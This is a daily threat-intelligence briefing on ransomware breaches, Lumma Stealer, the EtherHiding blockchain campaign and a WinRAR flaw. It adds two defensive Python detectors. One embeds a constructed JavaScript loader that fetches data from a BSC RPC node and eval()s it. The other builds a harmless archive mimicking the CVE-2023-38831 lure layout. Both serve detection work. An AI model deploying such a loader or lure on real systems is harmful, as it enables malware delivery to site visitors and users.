
Cyware Daily Threat Intelligence


Daily Threat Briefing Oct 16, 2023

The healthcare industry and public health data remain a significant target for ransomware groups like NoEscape. Federal authorities released an alert about the threat group and its activities, warning that “a successful exploitation by NoEscape ransomware will almost certainly result in the encryption and exfiltration of significant quantities of data.” Separately, Discord users are being advised to stay cautious of direct messages, especially those offering enticing rewards, as they may deliver malware. This follows the discovery of a malicious campaign that drops the information-stealing malware Lumma Stealer via Discord.

The decentralized nature of blockchain is proving to be an obstacle to containing an attack chain tracked as EtherHiding (Guardio Labs) and ClearFake (Sekoia): because the malicious payload is served from a smart contract rather than a conventional host, there is no single server to take down. The campaign starts from compromised WordPress sites and leads to the deployment of various malware loaders and trojans on the machines of visitors to those sites.

Top Breaches Reported in the Last 24 Hours

5TB of data allegedly stolen from each of two organizations

The ALPHV ransomware group allegedly compromised the network of Quality Service Installation (QSI), Inc., an ITM and ATM solutions provider, potentially exposing a 5TB SQL database as well as financial and client information from various sectors. Meanwhile, the group added Morrison Community Hospital to its list of victims, claiming 5TB of patients’ and employees’ information, backups, PII documents, and more.

Kwik Trip store chain suffers outages

Kwik Trip, a convenience store chain with more than 800 stores across the U.S., experienced widespread technology issues that disrupted services throughout the week. The company faced problems with its app, reward system, and phone service, which impacted customers attempting to make purchases. While the company confirmed the outages resulted from a "network incident," it did not provide information regarding whether it was a ransomware attack.

Decathlon’s employee data exposed

Data from an alleged Decathlon data breach, which occurred two years ago, has surfaced on the dark web. The PII of approximately 8,000 Decathlon employees, including full names, usernames, phone numbers, email addresses, residence locations, authentication tokens, and photographs, was exposed. The leak also contained information from Bluenove, a technology and consulting firm, which confirmed that duplicate copies of the database were circulating on darknet forums. Neither company has issued an official statement or response so far.

LockBit locks CDW for $80 million ransom

Technology services company CDW launched an investigation into ransom demands made by the LockBit ransomware group after the gang disrupted part of the firm’s network. CDW identified suspicious activity on servers belonging to its Sirius Federal subsidiary; those servers are isolated from CDW’s main network and dedicated to internal support for the subsidiary. Data taken from these servers has been published on the dark web. LockBit reportedly demanded an $80 million ransom from CDW, while the company reportedly offered only $1.1 million.

Top Malware Reported in the Last 24 Hours

Healthcare sector warned of NoEscape

Federal authorities issued a warning about the relatively new multi-extortion RaaS group NoEscape, which has listed a total of 77 victims on its leak site. NoEscape, which emerged in May, is believed to be a successor to the defunct Avaddon gang and has been targeting various industries, including healthcare and public health organizations. The group uses aggressive multi-extortion tactics, with extortion demands ranging from hundreds of thousands of dollars to over $10 million. NoEscape also offers DDoS attacks as an additional service to its affiliates.

Lumma Stealer leverages Discord for malware delivery

Security researchers discovered threat actors using the Discord platform to distribute Lumma Stealer, an information-stealing malware. Attackers leverage Discord's Content Delivery Network (CDN) to host and spread Lumma Stealer and create bots via Discord's API to control the malware remotely, so both delivery and command traffic blend in with legitimate Discord use. The malware is designed to steal user credentials, cryptocurrency wallets, and browser data. Lumma Stealer is sold as a service on underground forums, with different pricing tiers based on features and capabilities.

Binance's Smart Chain serves malicious code

Threat actors have been discovered using Binance's Smart Chain (BSC) contracts to serve malicious code in an ongoing campaign known as EtherHiding. Initially observed two months ago, the campaign leverages compromised WordPress sites: a script injected into the site presents visitors with a fake browser update warning, and the next-stage payload behind that warning is stored in a smart contract, from which the script retrieves it, ultimately leading to the deployment of information-stealing malware. Because the payload lives on the blockchain rather than on a server an abuse desk can take offline, the attackers can update it freely and defenders have no single host to block. Analysts at Sekoia are tracking the campaign as ClearFake and have published additional details about the broader campaign.
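The technique above gives a page-source signature that is worth hunting for: an injected script that makes a read-only JSON-RPC call (eth_call) to a BSC node, hex-decodes the returned bytes into a string, and executes the result. The scanner below is an added example, not code from the briefing, Guardio Labs or Sekoia. The indicator lists are my own assumptions (the bsc-dataseed hosts are real Binance public RPC endpoints, but which endpoints a given loader uses varies), and both sample pages are constructed; the contract address in the sample is a zero placeholder.

```python
"""Heuristic scanner for EtherHiding-style injections in web page source.

Added example (not from the briefing, Guardio Labs or Sekoia). The
EtherHiding shape: fetch a payload from a BSC contract with a read-only
eth_call (no transaction, no host to take down), hex-decode it, execute it.
A legitimate dapp front-end also calls the RPC but never eval()s the result,
which is the distinction the verdict relies on.
"""
import re

# Public BSC JSON-RPC hosts a loader might call. ASSUMPTION: extend from your
# own telemetry; these are commonly used public endpoints, not an exhaustive list.
BSC_RPC_HOSTS = ("bsc-dataseed", "binance.org", "bsc.nodereal.io", "rpc.ankr.com/bsc")

# Read-only contract call, raw JSON-RPC or via a web3 library.
RPC_CALL = re.compile(r"\beth_call\b|ethers\.Contract|web3\.eth\.Contract")
# Turning the hex-encoded return value back into text.
HEX_DECODE = re.compile(r"fromCharCode|hexToUtf8|toUtf8String")
# Dynamic execution of whatever came back from the chain.
DYN_EXEC = re.compile(
    r"\beval\s*\(|new\s+Function\s*\(|\.innerHTML\s*=|createElement\(\s*['\"]script['\"]"
)


def score_page(html: str) -> dict:
    """Return the indicators hit and a verdict for one page's source."""
    found = {
        "bsc_rpc": any(host in html for host in BSC_RPC_HOSTS),
        "rpc_call": bool(RPC_CALL.search(html)),
        "hex_decode": bool(HEX_DECODE.search(html)),
        "dyn_exec": bool(DYN_EXEC.search(html)),
    }
    # Chain fetch + dynamic execution is the loader shape; hex decoding on
    # its own is too common to count.
    suspicious = found["bsc_rpc"] and found["rpc_call"] and found["dyn_exec"]
    return {"indicators": found, "verdict": "suspicious" if suspicious else "clean"}


# Constructed sample: what an injected loader looks like (zero address placeholder).
INJECTED_SAMPLE = """<script>
(async()=>{const r=await fetch("https://bsc-dataseed1.binance.org/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x0000000000000000000000000000000000000000",data:"0x00"},"latest"]})});
const j=await r.json();let s="";
for(let i=2;i<j.result.length;i+=2)s+=String.fromCharCode(parseInt(j.result.substr(i,2),16));
eval(s);})();
</script>"""

# Constructed sample: a benign dapp reading a balance from the same RPC.
BENIGN_DAPP_SAMPLE = """<script>
(async()=>{const r=await fetch("https://bsc-dataseed1.binance.org/",{method:"POST",
body:JSON.stringify({jsonrpc:"2.0",id:1,method:"eth_call",
params:[{to:"0x0000000000000000000000000000000000000000",data:"0x00"},"latest"]})});
const j=await r.json();
document.getElementById("bal").textContent=parseInt(j.result,16).toString();})();
</script>"""


if __name__ == "__main__":
    for name, page in (("injected", INJECTED_SAMPLE), ("benign", BENIGN_DAPP_SAMPLE)):
        print(name, score_page(page))
```

Run it against crawled page bodies or the HTML stored by a WAF; a hit on the three combined indicators is a strong reason to pull the site's theme and plugin files for the injected script.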

Top Vulnerabilities Reported in the Last 24 Hours

Pro-Russian hacking groups abuse WinRAR bug

Pro-Russian hacking groups were observed using a recently disclosed security vulnerability (CVE-2023-38831) in the WinRAR compression software to conduct a phishing campaign aimed at harvesting credentials from compromised systems. The attack involves malicious archive files containing a decoy PDF that, when opened from within a vulnerable version of WinRAR, causes a Windows batch script hidden in the archive to execute. This script launches PowerShell commands to open a reverse shell, providing the attacker with remote access to the victim's system. The flaw is fixed in WinRAR 6.23; since WinRAR does not update itself, older installations remain exploitable until manually upgraded.
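Archives built for this bug have a recognizable layout: a decoy file at the archive root sits next to a directory with the same name (in the samples seen publicly, both carry a trailing space), and that directory holds a script whose name begins with the decoy's name. Since a file and a directory with identical names cannot coexist on a normal filesystem, the pattern is a reliable indicator on its own. The detector below is an added example, not code from the briefing; the layout it assumes is the publicly documented one for CVE-2023-38831, and the sample archive is constructed in memory with harmless contents.

```python
"""Flag ZIP archives laid out like the CVE-2023-38831 WinRAR lure.

Added example, not from the briefing. ASSUMED layout (publicly documented):
  report.pdf                <- decoy at the archive root (trailing space)
  report.pdf /report.pdf .cmd  <- same-named directory holding the script
Opening the decoy in a vulnerable WinRAR (< 6.23) also extracts and runs
the script. The sample archive below is constructed and harmless.
"""
from __future__ import annotations

import io
import zipfile

# Extensions the hidden file tends to use; extend as needed.
SCRIPT_EXTS = (".cmd", ".bat", ".vbs", ".js", ".exe", ".ps1", ".scr", ".lnk")


def find_winrar_lures(data: bytes) -> list[tuple[str, str]]:
    """Return (decoy, script) pairs where a root file shares its exact name
    with a directory that contains a script named after it."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        names = zf.namelist()
    files = {n for n in names if not n.endswith("/")}
    hits = []
    for decoy in files:
        if "/" in decoy:
            continue  # only root-level files can be the decoy
        prefix = decoy + "/"  # a directory with exactly the decoy's name
        for entry in files:
            if not entry.startswith(prefix):
                continue
            inner = entry[len(prefix):].lower()
            # The script's name starts with the decoy's name (spaces included)
            # so that WinRAR's temp-dir expansion matches it.
            if inner.startswith(decoy.lower()) and inner.endswith(SCRIPT_EXTS):
                hits.append((decoy, entry))
    return sorted(hits)


def build_sample_lure() -> bytes:
    """Constructed sample mimicking the lure layout; contents are inert."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf ", b"%PDF-1.4 decoy")
        zf.writestr("report.pdf /report.pdf .cmd", b"@echo off\r\necho constructed sample\r\n")
    return buf.getvalue()


def build_benign_sample() -> bytes:
    """Constructed ordinary archive that must not be flagged."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4 real")
        zf.writestr("notes/readme.txt", b"nothing to see")
    return buf.getvalue()


if __name__ == "__main__":
    print("lure:", find_winrar_lures(build_sample_lure()))
    print("benign:", find_winrar_lures(build_benign_sample()))
```

The same check works on mail-gateway attachments or a sandbox's file store; RAR archives need a RAR parser, but the name comparison is identical.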

Milesight industrial routers at risk

Multiple UR-series industrial cellular routers from Chinese IoT and video surveillance product manufacturer Milesight (Ursalink) were found to be affected by a serious information disclosure vulnerability (CVE-2023-43261). The flaw exposed system log files containing passwords for administrators and other users. While the passwords were not stored in plain text, they could be recovered, giving an unauthenticated attacker working credentials for the router. Milesight said it was already aware of the issue and had patched it. However, VulnCheck observed potential exploitation of the vulnerability on a small scale, with attackers possibly conducting reconnaissance, so operators should confirm their firmware is at a fixed version and rotate any credentials that may have appeared in exposed logs.
